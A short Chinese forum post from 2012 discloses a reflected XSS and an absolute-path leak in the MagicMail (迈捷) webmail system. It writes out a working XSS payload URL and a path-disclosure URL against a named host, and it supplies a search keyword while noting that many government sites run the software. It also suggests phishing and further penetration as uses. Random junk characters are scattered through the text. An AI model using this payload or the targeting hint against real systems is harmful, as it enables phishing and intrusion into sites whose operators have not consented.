今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
$ `" P( k) M0 k/ L) m' }% ?! @/ A8 f! R
$ O3 b/ t8 U. D8 D# Q. p
包含 一个反射性XSS 以及 绝对路径泄漏
0 G( R- Z R1 e, a( r6 ]) S看了看 貌似全部是linux的。
- |0 b5 L8 d: {" X
$ C8 G" ^! G% a9 ]关键字:迈捷邮件系统 by MagicMail
% u; Z) u8 Z: d
% T2 P6 o* c4 ^# t# S! q5 H$ ?可以看到很多政府网站都用这个邮件系统" V" S( L6 _) \- C5 k; @( L7 \# O
; E7 I2 S% ~ W3 @绝对路径 http://madman.in/index.php?login_type=declare&language=9 ^+ |+ L) d8 k+ J& m& p/ h, p
5 F# e0 ?: D' |8 V7 s
) Q- b. X% y8 V, s
5 ^$ _$ [8 z8 K4 ]- gXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E6 z8 Z- I' T1 o6 ]8 R8 o
( }6 |. z' ?, h% d5 D8 u, ~4 |! f) M6 m' H$ L7 B1 v
5 y* D; T% S' W5 z1 K+ g虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等$ z7 L) Y5 {% v B0 I! v% e0 Z
, ^; n" y' S! f4 w6 ]# ?& O0 Z9 @& q
修复方案:看官方补丁吧。
^% Q1 l6 U' [2 s- r: t |
发表于 2012-11-9 20:38:41
收藏
支持
反对